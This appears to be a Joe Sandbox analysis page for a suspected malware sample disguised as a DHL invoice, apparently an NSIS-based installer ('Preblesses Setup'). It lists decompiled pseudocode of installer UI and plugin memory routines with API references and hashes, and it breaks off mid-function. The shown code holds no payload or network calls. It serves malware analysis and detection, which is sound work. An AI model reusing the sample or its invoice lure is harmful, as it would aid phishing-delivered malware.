Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: File$ByteCharMultiPointerWide$Read
String ID: 9
API String ID: 1439708474-2366072709
Opcode ID: 9f93ca41379e5358701e9762d9d73a54771f02cb738d955fe51c94385f5bda32
Instruction ID: c0364eb4a24137c8a00bba018ae5694ccc63d4c43f2b92d4ab62ccb683855c39
Opcode Fuzzy Hash: 9f93ca41379e5358701e9762d9d73a54771f02cb738d955fe51c94385f5bda32
Instruction Fuzzy Hash: FD513B71618301AFD724DF11CA48A2BB7E8BFD5304F00483FF985A62D1DBB9D9458B66

Uniqueness

Uniqueness Score: -1.00%

Function 004056DA Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004056DA(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t18;
				unsigned int _t22;
				signed int _t28;

				_t18 = SendMessageW(_a4, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t18;
					_v60 = 4;
					SendMessageW(_a4, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t22 = GetMessagePos();
				_v16 = _t22 >> 0x10;
				_v20 = _t22;
				ScreenToClient(_a4,  &_v20);
				_t28 = SendMessageW(_a4, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t18 = _v8;
					goto L4;
				}
				return _t28 | 0xffffffff;
			}

0x004056f3
0x004056f9
0x00405739
0x00405739
0x0040574a
0x00405751
0x00000000
0x00405753
0x004056fb
0x00405708
0x00405712
0x00405715
0x00405729
0x0040572f
0x00405736
0x00000000
0x00405736
0x00000000

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004056F3
GetMessagePos.USER32 ref: 004056FB
ScreenToClient.USER32(?,?), ref: 00405715
SendMessageW.USER32(?,00001111,00000000,?), ref: 00405729
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00405751

Strings

f, xrefs: 0040572B

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 831e9add14996ca58957b6d0f39193948d4b40b41c3f38ee460bf659b5b9a320
Instruction ID: c2e7ed3a8a7ffde0c91d4cd6f33517ea70e65294e07f2b992d5a249d380e7f5b
Opcode Fuzzy Hash: 831e9add14996ca58957b6d0f39193948d4b40b41c3f38ee460bf659b5b9a320
Instruction Fuzzy Hash: 01014C7190020DBBEB119FA4CC45BEEBBB9EB44720F104226FA51B61E0D7B59A419F54

Uniqueness

Uniqueness Score: -1.00%

Function 00401FB8 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E00401FB8(struct HWND__* __edx, intOrPtr _a8, struct HWND__* _a24, intOrPtr _a36, signed char _a48) {
				void* _v12;
				int _t7;
				intOrPtr _t13;
				intOrPtr _t22;
				signed char _t26;
				struct HDC__* _t29;
				void* _t35;

				_t29 = GetDC(__edx);
				_t7 = E00403002(2);
				0x40d908->lfHeight =  ~(MulDiv(_t7, GetDeviceCaps(_t29, 0x5a), 0x48));
				ReleaseDC(_a24, _t29);
				_t13 = E00403002(3);
				_t26 = _a48;
				_push(_a36);
				 *0x40d918 = _t13;
				 *0x40d91f = 1;
				 *0x40d91c = _t26 & 0x00000001;
				_push("Calibri");
				 *0x40d91d = _t26 & 0x00000002;
				 *0x40d91e = _t26 & 0x00000004;
				E00405EBA();
				_push(CreateFontIndirectW(0x40d908));
				_push(_a8);
				E0040661F();
				_t22 =  *((intOrPtr*)(_t35 + 0x10));
				 *0x435ac8 =  *0x435ac8 + _t22;
				return 0;
			}

0x00401fc1
0x00401fc3
0x00401fe0
0x00401feb
0x00401ff3
0x00401ff9
0x00401ffd
0x00402001
0x0040200a
0x00402011
0x0040201d
0x00402022
0x00402027
0x0040202d
0x00402041
0x00402042
0x004016b7
0x00402ea1
0x00402ea5
0x00402eb7

APIs

GetDC.USER32 ref: 00401FB9
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401FD0
MulDiv.KERNEL32(00000000,00000000), ref: 00401FD8
ReleaseDC.USER32(?,00000000), ref: 00401FEB

Part of subcall function 00405EBA: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406070

CreateFontIndirectW.GDI32(0040D908), ref: 00402037

Strings

Calibri, xrefs: 0040201D

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectReleaselstrcat
String ID: Calibri
API String ID: 4253744674-1409258342
Opcode ID: 68512fbf4ac7801365b5f78afe65c0e513a631e9eafc47c317fc045465379f25
Instruction ID: 19ee21ee25b481e0e115610c7b0d21c914cbbc44bdafb393b7f83238122b1e8a
Opcode Fuzzy Hash: 68512fbf4ac7801365b5f78afe65c0e513a631e9eafc47c317fc045465379f25
Instruction Fuzzy Hash: 4B01D4B6905340AFD300AFB4AD0AB563FA8ABA9705F10483DF641B71E2C6784709CB2D

Uniqueness

Uniqueness Score: -1.00%

Function 0040364F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040364F(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t18;

				if(_a8 != 0x110) {
					if(_a8 == 0x113) {
						goto L3;
					}
				} else {
					SetTimer(_a4, "true", 0xfa, 0);
					L3:
					_t18 =  *0x40d968; // 0x9ef98
					_t19 =  <  ?  *0x40d96c : _t18;
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv( <  ?  *0x40d96c : _t18, 0x64, _t18));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}

0x0040365f
0x0040367c
0x00000000
0x00000000
0x00403661
0x0040366d
0x0040367e
0x0040367e
0x0040368b
0x004036a5
0x004036b5
0x004036c7
0x004036c7
0x004036cf

APIs

SetTimer.USER32(?,?,000000FA,00000000), ref: 0040366D
MulDiv.KERNEL32(0009EF98,00000064,0009EF98), ref: 00403695
wsprintfW.USER32 ref: 004036A5
SetWindowTextW.USER32(?,?), ref: 004036B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004036C7

Strings

verifying installer: %d%%, xrefs: 0040369F

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 7999ebd0115e22dc8382da0543a4734c08260491a853317dea2dbb1df602252a
Instruction ID: 5c883eac817cb3b9f0e850005900bd2bca04ae763b88d1ec11a0ecb90196ae4f
Opcode Fuzzy Hash: 7999ebd0115e22dc8382da0543a4734c08260491a853317dea2dbb1df602252a
Instruction Fuzzy Hash: 87013671940209BBDF249FA0DD49FAA3B78A700705F008439F606B51E1DBB59A55CF59

Uniqueness

Uniqueness Score: -1.00%

Function 6EF22209 Relevance: 9.1, APIs: 6, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E6EF22209(intOrPtr* _a4) {
				intOrPtr* _t23;
				signed int _t24;
				intOrPtr _t25;
				intOrPtr _t33;
				void* _t39;
				void* _t42;

				_t39 = E6EF212F8();
				_t23 = _a4;
				_t33 =  *((intOrPtr*)(_t23 + 0x1014));
				_t42 = (_t33 + 0x81 << 5) + _t23;
				do {
					if( *((intOrPtr*)(_t42 - 4)) >= 0) {
					}
					_t24 =  *(_t42 - 8) & 0x000000ff;
					if(_t24 <= 7) {
						switch( *((intOrPtr*)(_t24 * 4 +  &M6EF22331))) {
							case 0:
								 *_t39 = 0;
								goto L17;
							case 1:
								__edx =  *__edx;
								if(__ecx > 0) {
									__ecx = __ecx - 1;
									__ecx = __ecx *  *(0x6ef24064 + __eax * 4);
									asm("sbb eax, eax");
									__edx = __edx &  *(0x6ef24084 + __eax * 4);
								}
								_push(__edx);
								goto L15;
							case 2:
								_push(__edi);
								_push(__edx[1]);
								_push( *__edx);
								__eax = E6EF2149E(__ecx);
								goto L16;
							case 3:
								__ecx =  *0x6ef25040;
								__ecx - 1 = MultiByteToWideChar(0, 0,  *__edx, __ecx, __edi, __ecx - 1);
								__eax =  *0x6ef25040;
								__ecx = 0;
								 *((short*)(__edi + __eax * 2 - 2)) = __cx;
								goto L17;
							case 4:
								__eax = lstrcpynW(__edi,  *__edx,  *0x6ef25040);
								goto L17;
							case 5:
								_push( *0x6ef25040);
								_push(__edi);
								_push( *__edx);
								__imp__StringFromGUID2();
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfW(__edi, 0x6ef24058);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					if( *(_t42 + 0x14) != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t42 - 4)) > 0)) {
						GlobalFree( *(_t42 + 0x14));
					}
					_t25 =  *((intOrPtr*)(_t42 + 0xc));
					if(_t25 != 0) {
						if(_t25 != 0xffffffff) {
							if(_t25 > 0) {
								E6EF21638(_t25 - 1, _t39);
								goto L26;
							}
						} else {
							E6EF215EB(_t39);
							L26:
						}
					}
					_t42 = _t42 - 0x20;
					_t33 = _t33 - 1;
				} while (_t33 >= 0);
				return GlobalFree(_t39);
			}

0x6ef22211
0x6ef22213
0x6ef22217
0x6ef22226
0x6ef22228
0x6ef2222d
0x6ef2222d
0x6ef22235
0x6ef2223c
0x6ef22242
0x00000000
0x6ef2224b
0x00000000
0x00000000
0x6ef22253
0x6ef22257
0x6ef22259
0x6ef2225a
0x6ef22265
0x6ef22269
0x6ef22269
0x6ef22270
0x00000000
0x00000000
0x6ef22273
0x6ef22274
0x6ef22277
0x6ef22279
0x00000000
0x00000000
0x6ef22280
0x6ef22292
0x6ef22298
0x6ef2229d
0x6ef2229f
0x00000000
0x00000000
0x6ef222c0
0x00000000
0x00000000
0x6ef222a6
0x6ef222ac
0x6ef222ad
0x6ef222af
0x00000000
0x00000000
0x6ef222c8
0x6ef222ca
0x6ef222d0
0x6ef222d6
0x6ef222d6
0x00000000
0x00000000
0x6ef22242
0x6ef222d9
0x6ef222dd
0x6ef222f1
0x6ef222f1
0x6ef222f7
0x6ef222fc
0x6ef22301
0x6ef2230d
0x6ef22312
0x00000000
0x6ef22317
0x6ef22303
0x6ef22304
0x6ef22318
0x6ef22318
0x6ef22301
0x6ef22319
0x6ef2231c
0x6ef2231c
0x6ef2232f

APIs

Part of subcall function 6EF212F8: GlobalAlloc.KERNELBASE(00000040,?,6EF211C4,-000000A0), ref: 6EF21302

GlobalFree.KERNEL32(00000000), ref: 6EF222F1
GlobalFree.KERNEL32(00000000), ref: 6EF22326

Memory Dump Source

Source File: 00000000.00000002.11492715606.000000006EF21000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EF20000, based on PE: true

Associated: 00000000.00000002.11492664043.000000006EF20000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.11492760898.000000006EF24000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.11492804171.000000006EF26000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ef20000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 1cb073864075929e2d5b101242a2faf20fc75b86201f5191e666ba60c6609cf1
Instruction ID: 41edd8e8dbae07d2340b8fb11e150eea8ace09d0bd3abc3ae3039543aba8a9ae
Opcode Fuzzy Hash: 1cb073864075929e2d5b101242a2faf20fc75b86201f5191e666ba60c6609cf1
Instruction Fuzzy Hash: BA31DC32224502DFFB258FE8DA64F6AB7B8FB86305B000539F401DB194DB279885CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6EF210C7 Relevance: 8.9, APIs: 7, Instructions: 162
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EF210C7(void* _a8, intOrPtr _a12, void* _a16, intOrPtr _a20) {
				signed int _v0;
				signed int _t31;
				void* _t32;
				signed int _t34;
				void* _t39;
				void* _t46;
				intOrPtr _t55;
				void* _t59;
				void* _t66;
				void* _t67;
				signed short _t70;
				void* _t71;
				void* _t78;
				signed short _t79;
				void* _t83;
				void* _t85;
				void* _t86;
				void* _t88;
				signed int _t89;
				void* _t91;
				void _t94;
				void _t95;
				void* _t96;
				void* _t98;
				void* _t100;

				 *0x6ef25040 = _a8;
				 *0x6ef2503c = _a16;
				 *0x6ef25038 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x6ef25014, E6EF2132B, _t85, _t88);
				_t89 =  *0x6ef25040 * 0x28;
				_v0 = _t89;
				_t96 = E6EF21593();
				_a8 = _t96;
				_t86 = _t96;
				_t70 = _v0 & 0x0000ffff;
				if(_t70 != 0) {
					_t83 = 0xa;
					do {
						_t31 = _t70 & 0x0000ffff;
						_t86 = _t86 + 2;
						_t100 = _t31 - 0x66;
						if(_t100 > 0) {
							_t32 = _t31 - 0x6c;
							if(_t32 == 0) {
								goto L24;
							} else {
								_t39 = _t32 - 4;
								if(_t39 == 0) {
									goto L13;
								} else {
									_t46 = _t39;
									if(_t46 == 0) {
										goto L11;
									} else {
										goto L8;
									}
								}
							}
						} else {
							if(_t100 == 0) {
								_t78 =  *0x6ef2503c;
								_t91 =  *_t78;
								 *_t78 =  *_t91;
								_t79 = _v0;
								_t55 =  *((intOrPtr*)(_t79 + 0xc));
								_a12 = _t55;
								if( *((intOrPtr*)(_t91 + 4)) == 0x2691) {
									E6EF2132E(_t79, _t91 + 8, 0x38);
									_t79 = _v0;
									_t98 = _t98 + 0xc;
									_t55 = _a12;
								}
								 *((intOrPtr*)(_t79 + 0xc)) = _t55;
								GlobalFree(_t91);
								goto L16;
							} else {
								_t59 = _t31 - 0x46;
								if(_t59 == 0) {
									_t95 = GlobalAlloc(0x40, 8 +  *0x6ef25040 * 2);
									 *((intOrPtr*)(_t95 + 4)) = 0x2691;
									_t15 = _t95 + 8; // 0x8
									E6EF2132E(_t15, _v0, 0x38);
									 *_t95 =  *( *0x6ef2503c);
									 *( *0x6ef2503c) = _t95;
									goto L15;
								} else {
									_t66 = _t59 - 6;
									if(_t66 == 0) {
										L24:
										_t33 =  *0x6ef25010;
										if( *0x6ef25010 != 0) {
											E6EF2132E( *0x6ef25038, _t33 + 4, _t89);
											_t71 =  *0x6ef25010;
											_t98 = _t98 + 0xc;
											 *0x6ef25010 =  *_t71;
											GlobalFree(_t71);
											goto L26;
										}
									} else {
										_t67 = _t66 - 4;
										if(_t67 == 0) {
											 *_t86 =  *_t86 + _t83;
											L13:
											GlobalFree(E6EF215EB(E6EF21548(( *_t86 & 0x0000ffff) - 0x30)));
											_t86 = _t86 + 2;
											goto L26;
										} else {
											_t46 = _t67;
											if(_t46 == 0) {
												 *_t86 =  *_t86 + _t83;
												L11:
												GlobalFree(E6EF21638(( *_t86 & 0x0000ffff) - 0x30, E6EF21593()));
												_t86 = _t86 + 2;
												goto L16;
											} else {
												L8:
												if(_t46 == 1) {
													_t94 = GlobalAlloc(0x40, _t89 + 4);
													_t11 = _t94 + 4; // 0x4
													E6EF2132E(_t11,  *0x6ef25038, _v0);
													 *_t94 =  *0x6ef25010;
													 *0x6ef25010 = _t94;
													L15:
													_t98 = _t98 + 0xc;
													L16:
													_t89 = _v0;
													L26:
													_t83 = 0xa;
												}
											}
										}
									}
								}
							}
						}
						_t34 =  *_t86 & 0x0000ffff;
						_t70 = _t34;
					} while (_t34 != 0);
					_t96 = _a8;
				}
				return GlobalFree(_t96);
			}

0x6ef210cd
0x6ef210d7
0x6ef210e1
0x6ef210f5
0x6ef210f8
0x6ef210ff
0x6ef2110e
0x6ef21110
0x6ef21114
0x6ef21116
0x6ef2111d
0x6ef21129
0x6ef2112a
0x6ef2112a
0x6ef2112d
0x6ef21130
0x6ef21133
0x6ef21260
0x6ef21263
0x00000000
0x6ef21265
0x6ef21265
0x6ef21268
0x00000000
0x6ef2126e
0x6ef2126f
0x6ef21272
0x00000000
0x6ef21278
0x00000000
0x6ef21278
0x6ef21272
0x6ef21268
0x6ef21139
0x6ef21139
0x6ef21221
0x6ef2122c
0x6ef21230
0x6ef21232
0x6ef21235
0x6ef21238
0x6ef21240
0x6ef21249
0x6ef2124e
0x6ef21251
0x6ef21254
0x6ef21254
0x6ef21259
0x6ef2125c
0x00000000
0x6ef2113f
0x6ef2113f
0x6ef21142
0x6ef211ec
0x6ef211f5
0x6ef211f8
0x6ef211ff
0x6ef2120c
0x6ef21213
0x00000000
0x6ef21148
0x6ef21148
0x6ef2114b
0x6ef2127d
0x6ef2127d
0x6ef21284
0x6ef21291
0x6ef21296
0x6ef2129c
0x6ef212a2
0x6ef212a7
0x00000000
0x6ef212a7
0x6ef21151
0x6ef21151
0x6ef21154
0x6ef211b5
0x6ef211b8
0x6ef211cd
0x6ef211cf
0x00000000
0x6ef21156
0x6ef21157
0x6ef2115a
0x6ef21196
0x6ef21199
0x6ef211ae
0x6ef211b0
0x00000000
0x6ef2115c
0x6ef2115c
0x6ef2115f
0x6ef21175
0x6ef2117d
0x6ef21181
0x6ef2118c
0x6ef2118e
0x6ef21215
0x6ef21215
0x6ef21218
0x6ef21218
0x6ef212a9
0x6ef212ab
0x6ef212ab
0x6ef2115f
0x6ef2115a
0x6ef21154
0x6ef2114b
0x6ef21142
0x6ef21139
0x6ef212ac
0x6ef212af
0x6ef212b1
0x6ef212ba
0x6ef212ba
0x6ef212c5

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 6EF2116B
GlobalFree.KERNEL32(00000000), ref: 6EF211AE
GlobalFree.KERNEL32(00000000), ref: 6EF211CD
GlobalAlloc.KERNEL32(00000040,?), ref: 6EF211E6
GlobalFree.KERNEL32 ref: 6EF2125C
GlobalFree.KERNEL32(?), ref: 6EF212A7
GlobalFree.KERNEL32(00000000), ref: 6EF212BF

Memory Dump Source

Source File: 00000000.00000002.11492715606.000000006EF21000.00000020.00000001.01000000.00000004.sdmp, Offset: 6EF20000, based on PE: true

Associated: 00000000.00000002.11492664043.000000006EF20000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.11492760898.000000006EF24000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.11492804171.000000006EF26000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ef20000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 0f348f2788f8bb7dace8bc5f6fa262e885d9e02b6857310e6594d6c6ae6c975c
Instruction ID: dba7bbfe37144ac9354e3dcb41e1267ac6373621aecc61364d0986b0fffbe79d
Opcode Fuzzy Hash: 0f348f2788f8bb7dace8bc5f6fa262e885d9e02b6857310e6594d6c6ae6c975c
Instruction Fuzzy Hash: 7151D3715106029FDB50DFE8C960A6A77E8FF8A304B00493AF944DB294D736ED08CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00405560 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 90
stringCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00405560(signed int __ecx, intOrPtr _a8, signed int _a12, signed int _a16) {
				int _v12;
				char _v80;
				char _v136;
				signed int _t23;
				void* _t26;
				void* _t34;
				void* _t43;
				signed char _t45;
				signed int _t46;
				signed char _t50;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				void* _t59;
				signed int _t61;
				signed int _t63;

				_t23 = _a16;
				_t59 = 0xffffffdc;
				if(_t23 == 0) {
					_t54 = _a12;
					_t61 = _t54;
					asm("sbb ecx, ecx");
					_t43 = 0x14;
					asm("sbb eax, eax");
					_t26 = 0xffffffde;
					_t59 =  <  ? _t26 : _t59 +  ~0x100000;
					_t45 =  >=  ? (__ecx & 0xfffffff6) + _t43 : 0;
					if(_t61 < 0xffff3333) {
						asm("cdq");
						_t53 = 0x14;
						_t54 = _t61 + 1 / _t53;
					}
					_t50 = _t45;
					_t63 = _t54 >> _t50;
					_t51 = 0xa;
					_t46 = ((_t54 & 0x00ffffff) * 0xa >> _t50) % _t51;
				} else {
					_t63 = (_t23 << 0x00000020 | _a12) >> 0x14;
					_t46 = 0;
				}
				_push(_a8);
				_push(0x42bd48);
				E00405EBA();
				_push(0xffffffdf);
				_push( &_v136);
				_push(E00405EBA());
				_push(_t59);
				_t34 = E00405EBA();
				wsprintfW( &(0x42bd48[lstrlenW(0x42bd48)]), L"%u.%u%s%s", _t63, _t46, _t34,  &_v80);
				return SetDlgItemTextW( *0x4349dc, _v12, 0x42bd48);
			}

0x00405560
0x00405570
0x00405573
0x00405584
0x00405590
0x0040559b
0x004055a0
0x004055a7
0x004055af
0x004055b0
0x004055b7
0x004055c0
0x004055cb
0x004055cc
0x004055cf
0x004055cf
0x004055d4
0x004055dc
0x004055e7
0x004055ea
0x00405575
0x0040557c
0x00405580
0x00405580
0x004055ec
0x004055f8
0x004055f9
0x004055fe
0x00405604
0x0040560a
0x0040560b
0x00405611
0x0040562c
0x00405652

APIs

lstrlenW.KERNEL32(Preblesses Setup: Installing,%u.%u%s%s,?,00000000,00000000,?,000000DC,00000000,?,000000DF,Preblesses Setup: Installing,?,?,?,?,?), ref: 0040561F
wsprintfW.USER32 ref: 0040562C
SetDlgItemTextW.USER32(?,Preblesses Setup: Installing), ref: 00405643

Strings

%u.%u%s%s, xrefs: 00405619
Preblesses Setup: Installing, xrefs: 004055F3, 004055F8, 0040561E, 00405635

Memory Dump Source

Source File: 00000000.00000002.11457610037.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11457556627.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457683931.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11457726183.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11458191200.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_DHL_#U53d1#U7968.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$Preblesses Setup: Installing
API String ID: 3540041739-2395749691
Opcode ID: b3da9a1244fcee535f9463e31d5d6ec72300bd819393bad9935e8733ca876ae6
Instruction ID: ddca7360d09b2edd05df8fb08f039e75c7842db061d31d06a5ac0fb1d0c25846
Opcode Fuzzy Hash: b3da9a1244fcee535f9463e31d5d6ec72300bd819393bad9935e8733ca876ae6
Instruction Fuzzy Hash: 072106337402242BD724A9799C40FAB729DDBC1364F01473AFD6AF31D1E9399C1885A4

Uniqueness

Uniqueness Score: -1.00%

Function 6EF22049 Relevance: 7.6, APIs: 5, Instructions: 129
memoryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E6EF22049(signed int _a4) {
				signed int _t44;
				void* _t45;
				signed int _t46;
				signed int _t50;
				void* _t54;
				signed int _t57;
				void* _t58;
				int _t59;

				_t50 = _a4;
				_t59 = 0;
				_t44 = 0 |  *((intOrPtr*)(_t50 + 0x1014)) > 0x00000000;
				while(1) {
					L1:
					_a4 = _t44;
					_t57 = _t44 << 5;
					_t58 =  *(_t57 + _t50 + 0x1030);
					if(_t58 == 0 || _t58 == 0x1a) {
						goto L8;
					}
					if(_t58 != 0xffffffff) {
						_t49 = _t58 - 1;
						if(_t58 - 1 > 0x18) {
							 *(_t57 + _t50 + 0x1030) = 0x1a;
							L11:
							_t54 = _t57 + _t50;
							if( *((intOrPtr*)(_t57 + _t50 + 0x101c)) >= _t59) {
							}
							_t46 =  *(_t57 + _t50 + 0x1018) & 0x000000ff;
							 *(_t57 + _t50 + 0x1034) =  *(_t57 + _t50 + 0x1034) & 0x00000000;
							if(_t46 > 7) {
								L26:
